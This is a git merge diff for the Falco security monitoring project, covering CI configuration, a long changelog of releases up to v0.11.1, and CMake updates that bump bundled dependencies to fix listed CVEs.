Merge branch 'dev' into agent-master

Allow Lua sample_dir to be passed to falco_engine constructor
FALCO_ENGINE_SOURCE_LUA_DIR is still the default but can be overridden now.
2026-03-20 03:32:09 +00:00 · 2018-08-17 14:08:04 -07:00 · 2018-08-16 21:36:08 +02:00 · 2018-08-13 09:43:26 -07:00 · 2018-08-07 15:26:49 -07:00 · 2018-07-31 12:05:00 -07:00
161 changed files with 8470 additions and 942 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,7 @@
 /build*
 *~
-test/falco_test.pyc
+*.pyc
+
 test/falco_tests.yaml
 test/traces-negative
 test/traces-positive
@@ -12,7 +13,7 @@ test/results*.json.*
 userspace/falco/lua/re.lua
 userspace/falco/lua/lpeg.so

-docker/event-generator/event-generator
+docker/event-generator/event_generator
 docker/event-generator/mysqld
 docker/event-generator/httpd
 docker/event-generator/sha1sum
--- a/.travis.yml
+++ b/.travis.yml
@@ -2,40 +2,40 @@ language: c
 env:
    - BUILD_TYPE=Debug
    - BUILD_TYPE=Release
+sudo: required
+services:
+    - docker
 before_install:
    - sudo add-apt-repository -y ppa:ubuntu-toolchain-r/test
    - sudo apt-get update
 install:
    - sudo apt-get --force-yes install g++-4.8
-    - sudo apt-get install rpm linux-headers-$(uname -r)
+    - sudo apt-get install rpm linux-headers-$(uname -r) libelf-dev
    - git clone https://github.com/draios/sysdig.git ../sysdig
-    - sudo apt-get install -y python-pip libvirt-dev jq
+    - sudo apt-get install -y python-pip libvirt-dev jq dkms
    - cd ..
    - curl -Lo avocado-36.0-tar.gz https://github.com/avocado-framework/avocado/archive/36.0lts.tar.gz
    - tar -zxvf avocado-36.0-tar.gz
    - cd avocado-36.0lts
-    - sudo pip install -r requirements-travis.txt
+    - sed -e 's/libvirt-python>=1.2.9/libvirt-python>=1.2.9,<4.1.0/' < requirements.txt  > /tmp/requirements.txt && mv /tmp/requirements.txt ./requirements.txt
+    - sudo -H pip install -r requirements.txt
    - sudo python setup.py install
    - cd ../falco
 before_script:
-    - export KERNELDIR=/lib/modules/$(ls /lib/modules | sort | head -1)/build
+    - export KERNELDIR=/lib/modules/$(uname -r)/build
 script:
    - set -e
    - export CC="gcc-4.8"
    - export CXX="g++-4.8"
-    - wget https://s3.amazonaws.com/download.draios.com/dependencies/cmake-3.3.2.tar.gz
-    - tar -xzf cmake-3.3.2.tar.gz
-    - cd cmake-3.3.2
-    - ./bootstrap --prefix=/usr
-    - make
-    - sudo make install
-    - cd ..
    - mkdir build
    - cd build
-    - cmake .. -DCMAKE_BUILD_TYPE=$BUILD_TYPE
+    - cmake .. -DCMAKE_BUILD_TYPE=$BUILD_TYPE -DDRAIOS_DEBUG_FLAGS="-D_DEBUG -DNDEBUG"
    - make VERBOSE=1
    - make package
-    - cd ..
+    - cp falco*.deb ../docker/local
+    - cd ../docker/local
+    - docker build -t sysdig/falco:test .
+    - cd ../..
    - sudo test/run_regression_tests.sh $TRAVIS_BRANCH
 notifications:
  webhooks:
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,243 @@

 This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).

+## v0.11.1
+
+Released 2018-07-31
+
+## Bug Fixes
+
+* Fix a problem that caused the kernel module to not load on certain kernel versions [[#397](https://github.com/draios/falco/pull/397)] [[#394](https://github.com/draios/falco/issues/394)]
+
+## v0.11.0
+
+Released 2018-07-24
+
+## Major Changes
+
+* **EBPF Support** (Beta): Falco can now read events via an ebpf program loaded into the kernel instead of the `falco-probe` kernel module. Full docs [here](https://github.com/draios/sysdig/wiki/eBPF-(beta)). [[#365](https://github.com/draios/falco/pull/365)]
+
+## Minor Changes
+
+* Rules may now have an `skip-if-unknown-filter` property. If set to true, a rule will be skipped if its condition/output property refers to a filtercheck (e.g. `fd.some-new-attibute`) that is not present in the current falco version. [[#364](https://github.com/draios/falco/pull/364)] [[#345](https://github.com/draios/falco/issues/345)]
+* Small changes to Falco `COPYING` file so github automatically recognizes license [[#380](https://github.com/draios/falco/pull/380)]
+* New example integration showing how to connect Falco with Anchore to dynamically create falco rules based on negative scan results [[#390](https://github.com/draios/falco/pull/390)]
+* New example integration showing how to connect Falco, [nats](https://nats.io/), and K8s to run flexible "playbooks" based on Falco events [[#389](https://github.com/draios/falco/pull/389)]
+
+## Bug Fixes
+
+* Ensure all rules are enabled by default [[#379](https://github.com/draios/falco/pull/379)]
+* Fix libcurl compilation problems [[#374](https://github.com/draios/falco/pull/374)]
+* Add gcc-6 to docker container, which improves compatibility when building kernel module [[#382](https://github.com/draios/falco/pull/382)] [[#371](https://github.com/draios/falco/issues/371)]
+* Ensure the /lib/modules symlink to /host/lib/modules is set correctly [[#392](https://github.com/draios/falco/issues/392)]
+
+## Rule Changes
+
+* Add additional binary writing programs [[#366](https://github.com/draios/falco/pull/366)]
+* Add additional package management programs [[#388](https://github.com/draios/falco/pull/388)] [[#366](https://github.com/draios/falco/pull/366)]
+* Expand write_below_etc handling for additional programs [[#388](https://github.com/draios/falco/pull/388)] [[#366](https://github.com/draios/falco/pull/366)]
+* Expand set of programs allowed to write to `/etc/pki` [[#388](https://github.com/draios/falco/pull/388)]
+* Expand set of root written directories/files [[#388](https://github.com/draios/falco/pull/388)] [[#366](https://github.com/draios/falco/pull/366)]
+* Let pam-config read sensitive files [[#388](https://github.com/draios/falco/pull/388)]
+* Add additional trusted containers: openshift, datadog, docker ucp agent, gliderlabs logspout [[#388](https://github.com/draios/falco/pull/388)]
+* Let coreos update-ssh-keys write to /home/core/.ssh [[#388](https://github.com/draios/falco/pull/388)]
+* Expand coverage for MS OMS [[#388](https://github.com/draios/falco/issues/388)] [[#387](https://github.com/draios/falco/issues/387)]
+* Expand the set of shell spawning programs [[#366](https://github.com/draios/falco/pull/366)]
+* Add additional mysql programs/directories [[#366](https://github.com/draios/falco/pull/366)]
+* Let program `id` open network connections [[#366](https://github.com/draios/falco/pull/366)]
+* Opt-in rule for protecting tomcat shell spawns [[#366](https://github.com/draios/falco/pull/366)]
+* New rule `Write below monitored directory` [[#366](https://github.com/draios/falco/pull/366)]
+
+## v0.10.0
+
+Released 2018-04-24
+
+## Major Changes
+
+* **Rules Directory Support**: Falco will read rules files from `/etc/falco/rules.d` in addition to `/etc/falco/falco_rules.yaml` and `/etc/falco/falco_rules.local.yaml`. Also, when the argument to `-r`/falco.yaml `rules_file` is a directory, falco will read rules files from that directory. [[#348](https://github.com/draios/falco/pull/348)] [[#187](https://github.com/draios/falco/issues/187)]
+* Properly support all syscalls (e.g. those without parameter extraction by the kernel module) in falco conditions, so they can be included in `evt.type=<name>` conditions. [[#352](https://github.com/draios/falco/pull/352)]
+* When packaged as a container, start building kernel module with gcc 5.0 instead of gcc 4.9. [[#331](https://github.com/draios/falco/pull/331)]
+* New example puppet module for falco. [[#341](https://github.com/draios/falco/pull/341)] [[#115](https://github.com/draios/falco/issues/115)]
+* When signaled with `USR1`, falco will close/reopen log files. Include a [logrotate](https://github.com/logrotate/logrotate) example that shows how to use this feature for log rotation. [[#347](https://github.com/draios/falco/pull/347)] [[#266](https://github.com/draios/falco/issues/266)]
+* To improve resource usage, further restrict the set of system calls available to falco [[#351](https://github.com/draios/falco/pull/351)] [[draios/sysdig#1105](https://github.com/draios/sysdig/pull/1105)]
+
+## Minor Changes
+
+* Add gdb to the development Docker image (sysdig/falco:dev) to aid in debugging. [[#323](https://github.com/draios/falco/pull/323)]
+* You can now specify -V multiple times on the command line to validate multiple rules files at once. [[#329](https://github.com/draios/falco/pull/329)]
+* When run with `-v`, falco will print *dangling* macros/lists that are not used by any rules. [[#329](https://github.com/draios/falco/pull/329)]
+* Add an example demonstrating cryptomining attack that exploits an open docker daemon using host mounts. [[#336](https://github.com/draios/falco/pull/336)]
+* New falco.yaml option `json_include_output_property` controls whether the formatted string "output" is included in the json object when json output is enabled. [[#342](https://github.com/draios/falco/pull/342)]
+* Centralize testing event types for consideration by falco into a single function [[draios/sysdig#1105](https://github.com/draios/sysdig/pull/1105)) [[#356](https://github.com/draios/falco/pull/356)]
+* If a rule has an attribute `warn_evttypes`, falco will not complain about `evt.type` restrictions on that rule [[#355](https://github.com/draios/falco/pull/355)]
+* When run with `-i`, print all ignored events/syscalls and exit. [[#359](https://github.com/draios/falco/pull/359)]
+
+## Bug Fixes
+
+* Minor bug fixes to k8s daemonset configuration. [[#325](https://github.com/draios/falco/pull/325)] [[#296](https://github.com/draios/falco/pull/296)] [[#295](https://github.com/draios/falco/pull/295)]
+* Ensure `--validate` can be used interchangeably with `-V`. [[#334](https://github.com/draios/falco/pull/334)] [[#322](https://github.com/draios/falco/issues/322)]
+* Rule conditions like `fd.net` can now be used with the `in` operator e.g. `evt.type=connect and fd.net in ("127.0.0.1/24")`. [[draios/sysdig#1091](https://github.com/draios/sysdig/pull/1091)] [[#343](https://github.com/draios/falco/pull/343)]
+* Ensure that `keep_alive` can be used both with file and program output at the same time. [[#335](https://github.com/draios/falco/pull/335)]
+* Make it possible to append to a skipped macro/rule without falco complaining [[#346](https://github.com/draios/falco/pull/346)] [[#305](https://github.com/draios/falco/issues/305)]
+* Ensure rule order is preserved even when rules do not contain any `evt.type` restriction. [[#354](https://github.com/draios/falco/issues/354)] [[#355](https://github.com/draios/falco/pull/355)]
+
+## Rule Changes
+
+* Make it easier to extend the `Change thread namespace` rule via a `user_known_change_thread_namespace_binaries` list. [[#324](https://github.com/draios/falco/pull/324)]
+* Various FP fixes from users. [[#321](https://github.com/draios/falco/pull/321)] [[#326](https://github.com/draios/falco/pull/326)] [[#344](https://github.com/draios/falco/pull/344)] [[#350](https://github.com/draios/falco/pull/350)]
+* New rule `Disallowed SSH Connection` detects attempts ssh connection attempts to hosts outside of an expected set. In order to be effective, you need to override the macro `allowed_ssh_hosts` in a user rules file. [[#321](https://github.com/draios/falco/pull/321)]
+* New rule `Unexpected K8s NodePort Connection` detects attempts to contact the K8s NodePort range from a program running inside a container. In order to be effective, you need to override the macro `nodeport_containers` in a user rules file. [[#321](https://github.com/draios/falco/pull/321)]
+* Improve `Modify binary dirs` rule to work with new syscalls [[#353](https://github.com/draios/falco/pull/353)]
+* New rule `Unexpected UDP Traffic` checks for udp traffic not on a list of expected ports. Somewhat FP-prone, so it must be explicitly enabled by overriding the macro `do_unexpected_udp_check` in a user rules file. [[#320](https://github.com/draios/falco/pull/320)] [[#357](https://github.com/draios/falco/pull/357)]
+
+## v0.9.0
+
+Released 2018-01-18
+
+### Bug Fixes
+
+* Fix driver incompatibility problems with some linux kernel versions that can disable pagefault tracepoints [[#sysdig/1034](https://github.com/draios/sysdig/pull/1034)]
+* Fix OSX Build incompatibility with latest version of libcurl [[#291](https://github.com/draios/falco/pull/291)]
+
+### Minor Changes
+
+* Updated the Kubernetes example to provide an additional example: Daemon Set using RBAC and a ConfigMap for configuration. Also expanded the documentation for both the RBAC and non-RBAC examples. [[#309](https://github.com/draios/falco/pull/309)]
+
+### Rule Changes
+
+* Refactor the shell-related rules to reduce false positives. These changes significantly decrease the scope of the rules so they trigger only for shells spawned below specific processes instead of anywhere. [[#301](https://github.com/draios/falco/pull/301)] [[#304](https://github.com/draios/falco/pull/304)]
+* Lots of rule changes based on feedback from Sysdig Secure community [[#293](https://github.com/draios/falco/pull/293)] [[#298](https://github.com/draios/falco/pull/298)] [[#300](https://github.com/draios/falco/pull/300)] [[#307](https://github.com/draios/falco/pull/307)] [[#315](https://github.com/draios/falco/pull/315)]
+
+## v0.8.1
+
+Released 2017-10-10
+
+### Bug Fixes
+
+* Fix packaging to specify correct built-in config file [[#288](https://github.com/draios/falco/pull/288)]
+
+## v0.8.0
+
+Released 2017-10-10
+
+**Important**: the location for falco's configuration file has moved from `/etc/falco.yaml` to `/etc/falco/falco.yaml`. The default rules file has moved from `/etc/falco_rules.yaml` to `/etc/falco/falco_rules.yaml`. In addition, 0.8.0 has added a _local_ ruls file to `/etc/falco/falco_rules.local.yaml`. See [the documentation](https://github.com/draios/falco/wiki/Falco-Default-and-Local-Rules-Files) for more details.
+
+### Major Changes
+
+* Add the ability to append one list to another list by setting an `append: true` attribute. [[#264](https://github.com/draios/falco/pull/264)]
+* Add the ability to append one macro/rule to another list by setting an `append: true` attribute. [[#277](https://github.com/draios/falco/pull/277)]
+* Ensure that falco rules/config files are preserved across package upgrades/removes if modified. [[#278](https://github.com/draios/falco/pull/278)]
+* Add the notion of a "local" rules file that should contain modifications to the default falco rules file. [[#278](https://github.com/draios/falco/pull/278)]
+* When using json output, separately include the individual templated fields in the json object. [[#282](https://github.com/draios/falco/pull/282)]
+* Add the ability to keep a file/program pipe handle open across rule notifications. [[#283](https://github.com/draios/falco/pull/283)]
+* New argument `-V` validates rules file and immediately exits. [[#286](https://github.com/draios/falco/pull/286)]
+
+### Minor Changes
+
+* Minor updates to falco example programs [[#248](https://github.com/draios/falco/pull/248)] [[#275](https://github.com/draios/falco/pull/275)]
+* Also validate macros at rule parse time. [[#257](https://github.com/draios/falco/pull/257)]
+* Minor README typo fixes [[#276](https://github.com/draios/falco/pull/276)]
+* Add a government CLA (contributor license agreement). [[#263](https://github.com/draios/falco/pull/263)]
+* Add ability to only run rules with a priority >= some threshold [[#281](https://github.com/draios/falco/pull/281)]
+* Add ability to make output channels unbuffered [[#285](https://github.com/draios/falco/pull/285)]
+
+### Bug Fixes
+
+* Fix installation of falco on OSX [[#252](https://github.com/draios/falco/pull/252)]
+* Fix a bug that caused the trailing whitespace of a quoted string to be accidentally removed [[#254](https://github.com/draios/falco/pull/254)]
+* When multiple sets of kernel headers are installed, find the one for the running kernel [[#260](https://github.com/draios/falco/pull/260)]
+* Allow pathnames in rule/macro conditions to contain '.' characters [[#262](https://github.com/draios/falco/pull/262)]
+* Fix a bug where a list named "foo" would be substituted even if it were a substring of a longer word like "my_foo" [[#258](https://github.com/draios/falco/pull/258)]
+* Remove extra trailing newlines from rule output strings [[#265](https://github.com/draios/falco/pull/265)]
+* Improve build pathnames to avoid relative paths when possible [[#284](https://github.com/draios/falco/pull/284)]
+
+### Rule Changes
+
+* Significant changes to default ruleset to address FPs. These changes resulted from hundreds of hours of use in actual customer environments. [[#247](https://github.com/draios/falco/pull/247)] [[#259](https://github.com/draios/falco/pull/259)]
+* Add official gitlab EE docker image to list of known shell spawning images. Thanks @dkerwin! [[#270](https://github.com/draios/falco/pull/270)]
+* Add keepalived to list of shell spawning binaries. Thanks @dkerwin! [[#269](https://github.com/draios/falco/pull/269)]
+
+## v0.7.0
+
+Released 2017-05-30
+
+### Major Changes
+
+* Update the priorities of falco rules to use a wider range of priorities rather than just ERROR/WARNING. More info on the use of priorities in the ruleset can be found [here](https://github.com/draios/falco/wiki/Falco-Rules#rule-priorities). [[#244](https://github.com/draios/falco/pull/244)]
+
+### Minor Changes
+
+None.
+
+### Bug Fixes
+
+* Fix typos in various markdown files. Thanks @sublimino! [[#241](https://github.com/draios/falco/pull/241)]
+
+### Rule Changes
+
+* Add gitlab-mon as a gitlab binary, which allows it to run shells, etc. Thanks @dkerwin! [[#237](https://github.com/draios/falco/pull/237)]
+* A new rule Terminal shell in container" that looks for shells spawned in a container with an attached terminal. [[#242](https://github.com/draios/falco/pull/242)]
+* Fix some FPs related to the sysdig monitor agent. [[#243](https://github.com/draios/falco/pull/243)]
+* Fix some FPs related to stating containers combined with missed events [[#243](https://github.com/draios/falco/pull/243)]
+
+## v0.6.1
+
+Released 2017-05-15
+
+### Major Changes
+
+None
+
+### Minor Changes
+
+* Small changes to token bucket used to throttle falco events [[#234](https://github.com/draios/falco/pull/234)] [[#235](https://github.com/draios/falco/pull/235)] [[#236](https://github.com/draios/falco/pull/236)] [[#238](https://github.com/draios/falco/pull/238)]
+
+### Bug Fixes
+
+* Update the falco driver to work with kernel 4.11 [[#829](https://github.com/draios/sysdig/pull/829)]
+
+### Rule Changes
+
+* Don't allow apache2 to spawn shells in containers [[#231](https://github.com/draios/falco/issues/231)] [[#232](https://github.com/draios/falco/pull/232)]
+
+## v0.6.0
+
+Released 2017-03-29
+
+### Major Changes
+
+* Add the notion of tagged falco rules. Full documentation for this feature is available on the [wiki](https://github.com/draios/falco/wiki/Falco-Rules#rule-tags). [[#58](https://github.com/draios/falco/issues/58)] [[#59](https://github.com/draios/falco/issues/59)] [[#60](https://github.com/draios/falco/issues/60)] [[#206](https://github.com/draios/falco/pull/206)]
+* Falco now has its own dedicated kernel module. Previously, it would depend on sysdig being installed and would use sysdig's `sysdig-probe` kernel module. This ensures you can upgrade sysdig and falco without kernel driver compatibility problems. More details on the kernel module and its installation are on the [wiki](https://github.com/draios/falco/wiki/Falco-Kernel-Module). [[#215](https://github.com/draios/falco/issues/215)] [[#223](https://github.com/draios/falco/issues/223)] [[#224](https://github.com/draios/falco/pull/224)]
+* When providing multiple rules files by specifying `-r' multiple times, make sure that you can override rules/lists/macros. Previously, a list/macro/rule specified in an earlier file could not be overridden in a later file. [[#176](https://github.com/draios/falco/issues/176)] [[#177](https://github.com/draios/falco/pull/177)]
+* Add example k8s yaml files that show how to run falco as a k8s DaemonSet, and how to run falco-event-generator as a deployment running on one node. [[#222](https://github.com/draios/falco/pull/222)] [[#225](https://github.com/draios/falco/issues/225)] [[#226](https://github.com/draios/falco/pull/226)]
+* Update third party libraries to address security vulnerabilities. [[#182](https://github.com/draios/falco/pull/182)]
+* Falco can now be built on OSX. Like sysdig, on OSX it is limited to reading existing trace files. [[#210](https://github.com/draios/falco/pull/210)]
+
+### Minor Changes
+* Several changes to [falco-event-generator](https://github.com/draios/falco/wiki/Generating-Sample-Events) to improve usability. [[#205](https://github.com/draios/falco/pull/205)]
+* Switch to a formatter cache provided by sysdig code instead of using our own. [[#212](https://github.com/draios/falco/pull/212)]
+* Add automated tests that use locally-built docker images. [[#188](https://github.com/draios/falco/issues/188)]
+
+### Bug Fixes
+
+* Make sure output strings are not truncated when a given %field expression has a NULL value. [[#180](https://github.com/draios/falco/issues/180)] [[#181](https://github.com/draios/falco/pull/181)]
+* Allow ASSERTs when running travisci tests. [[#199](https://github.com/draios/falco/pull/199)]
+* Fix make dependencies for lyaml. [[#204](https://github.com/draios/falco/pull/204)] [[#130](https://github.com/draios/falco/issues/130)]
+* (This was a change in sysdig, but affected falco). Prevent hangs when traversing malformed parent thread state. [[#208](https://github.com/draios/falco/issues/208)]
+
+### Rule Changes
+
+* Add confd as a program that can write files below /etc and fleetctl as a program that can spawn shells. [[#175](https://github.com/draios/falco/pull/175)]
+* Add [exechealthz](https://github.com/kubernetes/contrib/tree/master/exec-healthz), a k8s liveness checking utility, to the list of shell spawners. [[#190](https://github.com/draios/falco/pull/190)]
+* Eliminate FPs related to weekly ubuntu cron jobs. [[#192](https://github.com/draios/falco/pull/192)]
+* Allow shells spawned by ansible, and eliminate FPs when managing machines via ansible. [[#193](https://github.com/draios/falco/pull/193)] [[#196](https://github.com/draios/falco/pull/196)] [[#202](https://github.com/draios/falco/pull/202)]
+* Eliminate FPs related to use of other security products. Thanks to @juju4 for the useful rule updates. [[#200](https://github.com/draios/falco/pull/200)]
+* Add additional possible locations for denyhosts, add [PM2](http://pm2.keymetrics.io/) as a shell spawner. [[#202](https://github.com/draios/falco/pull/202)]
+* Add flanneld as a privileged container, improve grouping for the "x running y" macros, allow denyhosts to spawn shells. [[#207](https://github.com/draios/falco/pull/207)]
+* Handle systemd changing its name to "(systemd)", add sv (part of [runit](http://smarden.org/runit/)) as a program that can write below /etc, allow writing to all `/dev/tty*` files. [[#209](https://github.com/draios/falco/pull/209)]
+* Add erl_child_setup as a shell spawner. Thanks to @dkerwin for the useful rule updates. [[#218](https://github.com/draios/falco/pull/218)]  [[#221](https://github.com/draios/falco/pull/221)]
+* Add support for gitlab omnibus containers/pods. Thanks to @dkerwin for the useful rule updates. [[#220](https://github.com/draios/falco/pull/220)]
+
 ## v0.5.0

 Released 2016-12-22
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -7,14 +7,16 @@ if(NOT DEFINED FALCO_VERSION)
 endif()

 if(NOT DEFINED FALCO_ETC_DIR)
-	set(FALCO_ETC_DIR "/etc")
+	set(FALCO_ETC_DIR "/etc/falco")
 endif()

 if(NOT CMAKE_BUILD_TYPE)
 	SET(CMAKE_BUILD_TYPE Release)
 endif()

-set(DRAIOS_DEBUG_FLAGS "-D_DEBUG")
+if(NOT DRAIOS_DEBUG_FLAGS)
+	set(DRAIOS_DEBUG_FLAGS "-D_DEBUG")
+endif()

 set(CMAKE_C_FLAGS "-Wall -ggdb ${DRAIOS_FEATURE_FLAGS}")
 set(CMAKE_CXX_FLAGS "-Wall -ggdb --std=c++0x ${DRAIOS_FEATURE_FLAGS}")
@@ -27,7 +29,9 @@ set(CMAKE_CXX_FLAGS_RELEASE "-O3 -fno-strict-aliasing -DNDEBUG")

 add_definitions(-DPLATFORM_NAME="${CMAKE_SYSTEM_NAME}")
 add_definitions(-DK8S_DISABLE_THREAD)
-add_definitions(-DHAS_CAPTURE)
+if(CMAKE_SYSTEM_NAME MATCHES "Linux")
+	add_definitions(-DHAS_CAPTURE)
+endif()

 if(CMAKE_BUILD_TYPE STREQUAL "Debug")
 	set(KBUILD_FLAGS "${DRAIOS_DEBUG_FLAGS} ${DRAIOS_FEATURE_FLAGS}")
@@ -37,13 +41,19 @@ endif()

 set(PACKAGE_NAME "falco")
 set(PROBE_VERSION "${FALCO_VERSION}")
-set(PROBE_NAME "sysdig-probe")
-set(PROBE_DEVICE_NAME "sysdig")
-set(CMAKE_INSTALL_PREFIX /usr)
+set(PROBE_NAME "falco-probe")
+set(PROBE_DEVICE_NAME "falco")
+if (CMAKE_INSTALL_PREFIX_INITIALIZED_TO_DEFAULT)
+	set(CMAKE_INSTALL_PREFIX /usr CACHE PATH "Default install path" FORCE)
+endif()

 set(CMD_MAKE make)

 set(SYSDIG_DIR "${PROJECT_SOURCE_DIR}/../sysdig")
+# make luaJIT work on OS X
+if(APPLE)
+	set(CMAKE_EXE_LINKER_FLAGS "-pagezero_size 10000 -image_base 100000000")
+endif()

 include(ExternalProject)

@@ -51,7 +61,7 @@ option(USE_BUNDLED_DEPS "Enable bundled dependencies instead of using the system

 #
 # zlib
-
+#
 option(USE_BUNDLED_ZLIB "Enable building of the bundled zlib" ${USE_BUNDLED_DEPS})

 if(NOT USE_BUNDLED_ZLIB)
@@ -68,8 +78,10 @@ else()
        set(ZLIB_INCLUDE "${ZLIB_SRC}")
        set(ZLIB_LIB "${ZLIB_SRC}/libz.a")
        ExternalProject_Add(zlib
-		URL "http://download.draios.com/dependencies/zlib-1.2.8.tar.gz"
-		URL_MD5 "44d667c142d7cda120332623eab69f40"
+		# START CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, CVE-2016-9843
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/zlib-1.2.11.tar.gz"
+                URL_MD5 "1c9f62f0778697a09d36121ead88e08e"
+		# END CHANGE for CVE-2016-9840, CVE-2016-9841, CVE-2016-9842, CVE-2016-9843
 		CONFIGURE_COMMAND "./configure"
 		BUILD_COMMAND ${CMD_MAKE}
 		BUILD_IN_SOURCE 1
@@ -94,11 +106,12 @@ else()
        set(JQ_INCLUDE "${JQ_SRC}")
        set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
        ExternalProject_Add(jq
-                URL "http://download.draios.com/dependencies/jq-1.5.tar.gz"
+                URL "http://s3.amazonaws.com/download.draios.com/dependencies/jq-1.5.tar.gz"
                URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
                CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
                BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
                BUILD_IN_SOURCE 1
+		PATCH_COMMAND wget -O jq-1.5-fix-tokenadd.patch https://github.com/stedolan/jq/commit/8eb1367ca44e772963e704a700ef72ae2e12babd.patch && patch -i jq-1.5-fix-tokenadd.patch
                INSTALL_COMMAND "")
 endif()

@@ -123,7 +136,7 @@ else()
 	set(CURSES_LIBRARIES "${CURSES_BUNDLE_DIR}/lib/libncurses.a")
 	message(STATUS "Using bundled ncurses in '${CURSES_BUNDLE_DIR}'")
 	ExternalProject_Add(ncurses
-		URL "http://download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/ncurses-6.0-20150725.tgz"
 		URL_MD5 "32b8913312e738d707ae68da439ca1f4"
 		CONFIGURE_COMMAND ./configure --without-cxx --without-cxx-binding --without-ada --without-manpages --without-progs --without-tests --with-terminfo-dirs=/etc/terminfo:/lib/terminfo:/usr/share/terminfo
 		BUILD_COMMAND ${CMD_MAKE}
@@ -150,7 +163,7 @@ else()
 	set(B64_INCLUDE "${B64_SRC}/include")
 	set(B64_LIB "${B64_SRC}/src/libb64.a")
 	ExternalProject_Add(b64
-		URL "http://download.draios.com/dependencies/libb64-1.2.src.zip"
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
 		URL_MD5 "a609809408327117e2c643bed91b76c5"
 		CONFIGURE_COMMAND ""
 		BUILD_COMMAND ${CMD_MAKE}
@@ -204,8 +217,10 @@ else()
 	message(STATUS "Using bundled openssl in '${OPENSSL_BUNDLE_DIR}'")

 	ExternalProject_Add(openssl
-		URL "http://download.draios.com/dependencies/openssl-1.0.2d.tar.gz"
-		URL_MD5 "38dd619b2e77cbac69b99f52a053d25a"
+		# START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
+                URL_MD5 "13bdc1b1d1ff39b6fd42a255e74676a4"
+		# END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
 		CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
 		BUILD_COMMAND ${CMD_MAKE}
 		BUILD_IN_SOURCE 1
@@ -235,9 +250,11 @@ else()

 	ExternalProject_Add(curl
 		DEPENDS openssl
-		URL "http://download.draios.com/dependencies/curl-7.45.0.tar.bz2"
-		URL_MD5 "62c1a352b28558f25ba6209214beadc8"
-		CONFIGURE_COMMAND ./configure ${CURL_SSL_OPTION} --disable-shared --enable-optimize --disable-curldebug --disable-rt --enable-http --disable-ftp --disable-file --disable-ldap --disable-ldaps --disable-rtsp --disable-telnet --disable-tftp --disable-pop3 --disable-imap --disable-smb --disable-smtp --disable-gopher --disable-sspi --disable-ntlm-wb --disable-tls-srp --without-winssl --without-darwinssl --without-polarssl --without-cyassl --without-nss --without-axtls --without-ca-path --without-ca-bundle --without-libmetalink --without-librtmp --without-winidn --without-libidn --without-nghttp2 --without-libssh2
+		# START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/curl-7.60.0.tar.bz2"
+		URL_MD5 "bd2aabf78ded6a9aec8a54532fd6b5d7"
+		# END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
+		CONFIGURE_COMMAND ./configure ${CURL_SSL_OPTION} --disable-shared --enable-optimize --disable-curldebug --disable-rt --enable-http --disable-ftp --disable-file --disable-ldap --disable-ldaps --disable-rtsp --disable-telnet --disable-tftp --disable-pop3 --disable-imap --disable-smb --disable-smtp --disable-gopher --disable-sspi --disable-ntlm-wb --disable-tls-srp --without-winssl --without-darwinssl --without-polarssl --without-cyassl --without-nss --without-axtls --without-ca-path --without-ca-bundle --without-libmetalink --without-librtmp --without-winidn --without-libidn --without-nghttp2 --without-libssh2 --disable-threaded-resolver
 		BUILD_COMMAND ${CMD_MAKE}
 		BUILD_IN_SOURCE 1
 		INSTALL_COMMAND "")
@@ -269,7 +286,7 @@ else()
 	set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
 	set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
 	ExternalProject_Add(luajit
-		URL "http://download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
+		URL "http://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
 		URL_MD5 "f14e9104be513913810cd59c8c658dc0"
 		CONFIGURE_COMMAND ""
 		BUILD_COMMAND ${CMD_MAKE}
@@ -292,14 +309,19 @@ if(NOT USE_BUNDLED_LPEG)
 else()
 	set(LPEG_SRC "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg")
 	set(LPEG_LIB "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg/build/lpeg.a")
+	message(STATUS "Using bundled lpeg in '${LPEG_SRC}'")
+	set(LPEG_DEPENDENCIES "")
+	if(USE_BUNDLED_LUAJIT)
+		list(APPEND LPEG_DEPENDENCIES "luajit")
+	endif()
 	ExternalProject_Add(lpeg
-                DEPENDS luajit
+		DEPENDS ${LPEG_DEPENDENCIES}
 		URL "http://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
-                URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
-                BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
-                BUILD_IN_SOURCE 1
+		URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
+		BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
+		BUILD_IN_SOURCE 1
 		CONFIGURE_COMMAND ""
-                INSTALL_COMMAND "")
+		INSTALL_COMMAND "")
 endif()

 #
